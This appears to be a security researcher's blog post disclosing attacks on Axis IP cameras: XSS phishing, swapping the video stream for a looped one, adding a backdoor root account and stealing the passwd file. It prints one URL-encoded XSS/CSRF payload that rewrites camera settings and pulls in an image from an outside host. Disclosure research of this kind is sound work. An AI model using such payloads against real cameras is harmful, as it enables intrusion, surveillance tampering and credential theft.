I’ve done some research on Axis IP cameras, which now I am able to disclose to you and reveal some of the magic. Although this is not independent research, I am mentioning it here as it may interest some.

The research is made of two components: a purple paper (one of the traditions we follow in GNUCITIZEN) and a video. I promise you that I won’t bore you with PoCs, but actual Hollywood-style exploits. This includes the classic attack in which the legitimate video stream gets replaced by another stream that keeps looping forever (remember Speed). We even created a demo video of this attack! Blame Major Malfunction (soon to be featured) for this, as he suggested the third-party-video infinite loop technique.

Here are some of the juicy bits, mentioned in the paper:

  • Cross-browser XSS phishing
  • Replacing the legitimate video stream with our own
  • Adding a Backdoor Root Account
  • Stealing the ‘passwd’ File

Here is an example of an exploit that we’ve come up with. You don’t know what it is doing? Well…, read the paper for more details:

http://target/%3cscript%20src=%22/this_server/ServerManager.sr
v%3fconf_Layout_TitleEnabled=yes&Layout_TitleEnabled=on&conf_L
ayout_OwnTitleEnabled=yes&conf_Layout_OwnTitle=%3cimg%20src=ht
tp://snipu.com/f1%3e%3c!--
&servermanager_do=set_variables%22%3e%3c/script%3e%3c!--
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAA